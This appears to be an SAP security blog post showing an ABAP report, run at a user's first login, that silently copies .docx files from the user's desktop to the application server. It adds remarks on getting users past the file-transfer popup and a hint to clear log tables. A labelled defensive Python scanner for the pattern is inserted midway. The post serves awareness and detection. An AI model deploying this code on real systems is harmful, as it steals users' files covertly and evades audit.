SAP GUI

Getting Files from Local PC via SAP GUI with Illegal Methods

Learn how to retrieve local files from a user's desktop using SAP GUI in SAP systems and understand the potential security risks involved.
Defencemore Team

Introduction

In this blog post, we demonstrate how local files can be retrieved from a user's desktop via SAP GUI in SAP systems. The method involves creating an ABAP program that runs on the user's first login and copies selected files from the user's PC to a directory on the application server. This technique highlights a potential security weakness that SAP system administrators and security experts should be aware of.

Step-by-Step Guide

Creating the ABAP Program

First, we create an ABAP program in the target SAP system. The program code is shown below:

REPORT ZFILE_DOWNLOAD_TO_SERVER_3.

DATA: lv_filename TYPE string,
      file_content TYPE string,
      lv_file_line TYPE string,
      lt_file_data TYPE TABLE OF string.

DATA: filename LIKE rlgrap-filename,
      directory LIKE bdschko16-target_dir,
      itab_dir LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      itab_file LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      dstpath LIKE draw-filep.

directory = 'C:\Users\burha\OneDrive\Desktop\'.
" You can use %UserProfile%\Desktop instead of static

dstpath = '/usr/sap/trans/tmp/new_dir/'.
" This directory was chosen for easier access to the files imported from the local PC

CALL FUNCTION 'TMP_GUI_DIRECTORY_LIST_FILES'
  EXPORTING
    directory = directory
    FILTER = '*.docx'
  TABLES
    file_table = itab_file
    dir_table = itab_dir.

IF sy-subrc <> 0.
  " Error handling
ENDIF.

LOOP AT itab_file.
  CALL FUNCTION 'GUI_UPLOAD'
    EXPORTING
      filename = directory && itab_file-pathname
      filetype = 'ASC'
    TABLES
      data_tab = lt_file_data
    EXCEPTIONS
      file_open_error = 1
      file_read_error = 2
      no_batch = 3
      gui_refuse_filetransfer = 4
      invalid_type = 5
      no_authority = 6
      unknown_error = 7
      bad_data_format = 8
      header_not_allowed = 9
      separator_not_allowed = 10
      header_too_long = 11
      unknown_dp_error = 12
      access_denied = 13
      dp_out_of_memory = 14
      disk_full = 15
      dp_timeout = 16
      not_supported_by_gui = 17
      error_no_gui = 18
      OTHERS = 19.

  IF sy-subrc <> 0.
    MESSAGE ID sy-msgid TYPE sy-msgty NUMBER sy-msgno
      WITH sy-msgv1 sy-msgv2 sy-msgv3 sy-msgv4.
    EXIT.
  ENDIF.

  DATA: lv_server_dest TYPE string.
  lv_server_dest = dstpath && itab_file-pathname.

  OPEN DATASET lv_server_dest FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
  IF sy-subrc <> 0.
    " RAISE is only valid inside function modules and methods; report the error and stop
    WRITE: / 'Could not open', lv_server_dest.
    EXIT.
  ENDIF.

  LOOP AT lt_file_data INTO lv_file_line.
    TRANSFER lv_file_line TO lv_server_dest.
  ENDLOOP.

  " Close the dataset that was actually opened above (lv_server_dest, not lv_filename)
  CLOSE DATASET lv_server_dest.
ENDLOOP.

" Clear history after execution
" Log tables: USR04 and USH04
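As a defensive counterpart, here is an added example (not code from the original post or from DefenceMore): a small Python static check that flags ABAP reports combining a frontend file read (GUI_UPLOAD, WS_UPLOAD, TMP_GUI_DIRECTORY_LIST_FILES or the cl_gui_frontend_services methods) with a server-side OPEN DATASET ... FOR OUTPUT, which is exactly the combination in the report above. The regexes, the comment handling and the two sample reports are constructed for this example; it also covers the class-based method calls, which the post's report does not use.

```python
import re

# Function modules and methods that read files from the user's PC through SAP GUI.
FRONTEND_READ_FUNCS = {"GUI_UPLOAD", "WS_UPLOAD", "TMP_GUI_DIRECTORY_LIST_FILES"}
CALL_FUNC_RE = re.compile(r"^\s*CALL\s+FUNCTION\s+'([A-Z0-9_/]+)'", re.I)
FRONTEND_METHOD_RE = re.compile(
    r"\bCL_GUI_FRONTEND_SERVICES=>(GUI_UPLOAD|DIRECTORY_LIST_FILES)\b", re.I)
# File write on the application server's file system.
SERVER_WRITE_RE = re.compile(r"^\s*OPEN\s+DATASET\b.*\bFOR\s+(OUTPUT|APPENDING)\b", re.I)


def strip_comment(raw):
    # '*' in column 1 is a full-line ABAP comment; '"' starts a trailing one.
    # Simplification: a '"' inside a string literal also truncates the line.
    return "" if raw.startswith("*") else raw.split('"', 1)[0]


def scan_abap(source):
    """Frontend reads and server writes in one report; doing both is the copy pattern above."""
    reads, writes = [], []
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = strip_comment(raw)
        m = CALL_FUNC_RE.match(line)
        if m and m.group(1).upper() in FRONTEND_READ_FUNCS:
            reads.append((lineno, m.group(1).upper()))
        m = FRONTEND_METHOD_RE.search(line)
        if m:
            reads.append((lineno, "CL_GUI_FRONTEND_SERVICES=>" + m.group(1).upper()))
        if SERVER_WRITE_RE.match(line):
            writes.append((lineno, line.strip()))
    return {"frontend_reads": reads, "server_writes": writes,
            "exfil_pattern": bool(reads and writes)}


# Constructed sample: a condensed version of the report shown above.
SUSPECT_REPORT = """REPORT ZFILE_DOWNLOAD_TO_SERVER_3.
CALL FUNCTION 'TMP_GUI_DIRECTORY_LIST_FILES'
  EXPORTING directory = directory FILTER = '*.docx'
  TABLES file_table = itab_file dir_table = itab_dir.
LOOP AT itab_file.
  CALL FUNCTION 'GUI_UPLOAD'
    EXPORTING filename = directory && itab_file-pathname
    TABLES data_tab = lt_file_data.
  OPEN DATASET lv_server_dest FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
  TRANSFER lv_file_line TO lv_server_dest.
ENDLOOP.
"""
# Constructed benign sample: reads a server file only; the frontend call is just a comment.
BENIGN_REPORT = """REPORT ZREAD_LOG.
* CALL FUNCTION 'GUI_UPLOAD' appears only in this comment line.
OPEN DATASET lv_path FOR INPUT IN TEXT MODE ENCODING DEFAULT.
"""
```

Run scan_abap over exported Z*/Y* report sources (for example from SE38 downloads) and review every hit where exfil_pattern is True; the line numbers point at the call sites to inspect.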

Linking the Program to a Transaction Code

Now we link the program we created to a transaction code (tcode). For this, we create a new transaction code using transaction SE93.

Transaction Code Creation

Adding a Row to AGRDATEU Table

Now that we have our tcode, we add a new row to the AGRDATEU table so that this program runs the first time the user logs into the system.

AGRDATEU Table

Filtering Files for Download

The files are selected according to the filter given in the ABAP program code and written to the /usr/sap/trans/tmp/new_dir folder on the server.

File Filter

Security Popup on Login

When the user logs in to the system, the SAP GUI security popup for the file transfer is shown. This confirmation can be overlooked by careless users. In addition, the popup behaviour can be changed in the SAP GUI settings or in the registry of the user's computer.

Security Popup

Viewing the Downloaded File

The local file can then be seen in the application server directory.

Local File on Server

SAP GUI Security Settings

SAP GUI security settings did not perform this check before version 7.20. Since 7.20, the permission handling for file upload and download operations has been improved.

SAP GUI Security Settings

Conclusion

Although this weakness is unlikely to be exploited, it is important for SAP system administrators to be aware of such methods and to take preventive measures. DefenceMore's One Click Audit for SAP can help protect your systems from such attacks.

Contact us to learn more and schedule a free demo of our product that detects security vulnerabilities in SAP systems. Ensure your systems are not only functional but also secure.

Dec 27, 2024
